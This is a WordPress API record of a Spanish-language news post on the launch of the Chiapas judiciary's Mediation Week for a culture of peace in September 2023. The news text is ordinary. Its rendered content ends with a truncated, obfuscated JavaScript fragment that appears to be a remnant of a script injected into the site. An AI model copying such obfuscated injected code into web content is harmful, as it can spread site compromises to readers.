{"id":11985,"date":"2023-09-26T05:18:33","date_gmt":"2023-09-26T05:18:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11985"},"modified":"2023-09-26T05:18:33","modified_gmt":"2023-09-26T05:18:33","slug":"inauguran-la-semana-de-la-mediacion-en-el-poder-judicial-de-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11985","title":{"rendered":"Inauguran la Semana de la Mediaci\u00f3n en el Poder Judicial de Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-8.35.00-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-11987\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-8.35.00-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-8.35.00-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-8.35.00-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-8.35.00-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-8.35.00-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Las actividades tienen como objetivo sensibilizar, capacitar e intercambiar experiencias en temas de Justicia Alternativa y Justicia Restaurativa.- Se tienen programadas participaciones con ocho Centros de Justicia Alternativa del pa\u00eds: Estado de M\u00e9xico, Guerrero, Michoac\u00e1n, Nuevo Le\u00f3n, Sonora, Baja California, Sinaloa e Hidalgo.Tuxtla Guti\u00e9rrez, Chiapas; a 25 de septiembre de 2023.- En el marco de la conmemoraci\u00f3n de los 12 a\u00f1os de la Implementaci\u00f3n de la Justicia Alternativa en Chiapas, el Poder Judicial del Estado, a trav\u00e9s del Centro Estatal de Justicia Alternativa (CEJA), en coordinaci\u00f3n con el Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, arranc\u00f3 la Semana de la Mediaci\u00f3n por Una Cultura de Paz, que se llevar\u00e1 a cabo del 25 al 29 de septiembre.Durante la inauguraci\u00f3n en Sala de Presidentes de la casa de la justicia, la consejera de la Judicatura, Zelmira Perla de Roc\u00edo Guti\u00e9rrez Beltr\u00e1n, encabez\u00f3 este evento en representaci\u00f3n del magistrado presidente del Poder Judicial del Estado, Guillermo Ramos P\u00e9rez, junto al consejero Omar Heleria Reyes y de la directora General del CEJA, Elisheba Goldhaber Pasillas.En su discurso inaugural, la consejera dio la bienvenida al director general del Centro Estatal de Mediaci\u00f3n, Conciliaci\u00f3n y Justicia Restaurativa del Poder Judicial del Estado de M\u00e9xico y ponente, Sergio Arturo Valls Esponda, as\u00ed como a las personas especialistas p\u00fablicas del CEJA y el p\u00fablico en general que de manera presencial y virtual asistieron al arranque de las actividades.Asimismo, Guti\u00e9rrez Beltr\u00e1n pidi\u00f3 a las y los participantes aprovechar las actividades que se estar\u00e1n desarrollando y que las herramientas adquiridas ayuden en la construcci\u00f3n de una mejor sociedad, donde ante el conflicto siempre se privilegie el di\u00e1logo y la cultura de la paz en nuestra entidad.Al arrancar las actividades se realiz\u00f3 la Conferencia Los cuatro pilares de la mediaci\u00f3n, disertada por el director general del Centro Estatal de Mediaci\u00f3n, Conciliaci\u00f3n y Justicia Restaurativa del Poder Judicial del Estado de M\u00e9xico, Sergio Arturo Valls Esponda; y el Panel Justicia Restaurativa y su Impacto Institucional, entre el Poder Judicial y la Fiscal\u00eda General del Estado.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Las actividades tienen como objetivo sensibilizar, capacitar e intercambiar experiencias en temas de Justicia Alternativa y Justicia Restaurativa.- Se tienen programadas participaciones con ocho Centros de Justicia Alternativa del pa\u00eds: Estado de M\u00e9xico, Guerrero, Michoac\u00e1n, Nuevo Le\u00f3n, Sonora, Baja California, Sinaloa e Hidalgo.Tuxtla Guti\u00e9rrez, Chiapas; a 25 de septiembre de 2023.- En el marco de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11987,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-11985","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11985","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11985"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11985\/revisions"}],"predecessor-version":[{"id":11988,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11985\/revisions\/11988"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11987"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11985"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11985"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11985"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}